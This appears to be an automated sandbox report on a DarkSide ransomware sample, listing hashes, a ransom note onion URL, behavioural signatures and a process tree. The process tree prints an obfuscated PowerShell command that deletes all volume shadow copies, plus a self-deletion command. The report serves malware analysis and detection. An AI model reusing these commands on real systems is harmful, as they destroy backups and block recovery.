Analysis
-
max time kernel
118s -
max time network
130s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system -
submitted
19-08-2023 15:27
Static task
static1
Behavioral task
behavioral1
Sample
485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Resource
win7-20230712-en
Behavioral task
behavioral2
Sample
485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
Resource
win10v2004-20230703-en
General
-
Target
485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe
-
Size
58KB
-
MD5
485b9fd90d99ec5e6683fa4448924da8
-
SHA1
744d07feeaa7cb10b11d5ec72418bd1ecbbba819
-
SHA256
93cb3d33780673999559924e7df3f1d930ab9eda4ce61f8c6fed80547c8b7234
-
SHA512
3734e195e9a9a73a5ae0b8daa88b62303da69a2734312448cf26d469c2a811e0ebe4bfd0b90f56e6bf1998d1b4baccece7811bcb78bec1f196819e289f45a0b6
-
SSDEEP
768:ZjjmbIax7F3DS4/S9+CuUSbVAdNcxGV1ylvMpY23W58:Cx7Fu4/ihrhDTV1ylvMSZ58
Malware Config
Extracted
C:\Users\README.795a92b9.TXT
darkside
http://darksidfqzcuhtk2.onion/CZEX8E0GR0AO4ASUCJE1K824OKJA1G24B8B3G0P84LJTTE7W8EC86JBE7NBXLMRT
Signatures
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Renames multiple (149) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\795a92b9.BMP" 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\795a92b9.BMP" 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies Control Panel 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-618519468-4027732583-1827558364-1000\Control Panel\Desktop\WallpaperStyle = "10" 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe -
Modifies registry class 5 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.795a92b9\ = "795a92b9" 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\795a92b9\DefaultIcon 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\795a92b9 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\795a92b9\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\795a92b9.ico" 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.795a92b9 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 2204 powershell.exe 2204 powershell.exe 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeSecurityPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeTakeOwnershipPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeLoadDriverPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeSystemProfilePrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeSystemtimePrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeProfSingleProcessPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeIncBasePriorityPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeCreatePagefilePrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeBackupPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeRestorePrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeShutdownPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeDebugPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeSystemEnvironmentPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeRemoteShutdownPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeUndockPrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeManageVolumePrivilege 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: 33 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: 34 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: 35 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: 36 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe Token: SeDebugPrivilege 2204 powershell.exe Token: SeBackupPrivilege 352 vssvc.exe Token: SeRestorePrivilege 352 vssvc.exe Token: SeAuditPrivilege 352 vssvc.exe -
Suspicious use of WriteProcessMemory 5 IoCs
description pid Process procid_target PID 2844 wrote to memory of 2204 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe 82 PID 2844 wrote to memory of 2204 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe 82 PID 2844 wrote to memory of 5168 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe 94 PID 2844 wrote to memory of 5168 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe 94 PID 2844 wrote to memory of 5168 2844 485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe 94
Processes
-
C:\Users\Admin\AppData\Local\Temp\485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe"C:\Users\Admin\AppData\Local\Temp\485b9fd90d99ec5e6683fa4448924da8_darkside_JC.exe"1⤵
- Sets desktop wallpaper using registry
- Modifies Control Panel
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2844 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2204
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C DEL /F /Q C:\Users\Admin\AppData\Local\Temp\485B9F~1.EXE >> NUL2⤵PID:5168
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:352
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
1KB
MD52247453c28acd1eb75cfe181540458a8
SHA1851fc5a9950d422d76163fdc6a453d6859d56660
SHA256358b8df2d92a70274c5ec8e50bf6353c37a7fe1855fd9659f610f8a96eac19bd
SHA51242475e640ee70ab4bd7350dbd970c5862f1597918b6a5e3ee038a10a5c5b883ac61038ecec51a7bfe7cb615798d832fae4a3ead9571f35825a644dee1f2dd7d3
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1KB
MD565494ea6831e577d82fac2b91b9c3d43
SHA15c23717d22ee9b94306f2d5a2a53c60aca03eb8c
SHA2565e98b41a51606e16dda30ad4a49457227f75d71ad2004e2942c6b8de6202c4f3
SHA51228ba13f7793ac8271af03b26eaeba6cbe707bf1f07fb1792818a6ab270d1c20d0091ef4a10c092f60c373aefe09698d2b470ec6a7f8cfa47103fd8bbb8d7a7bb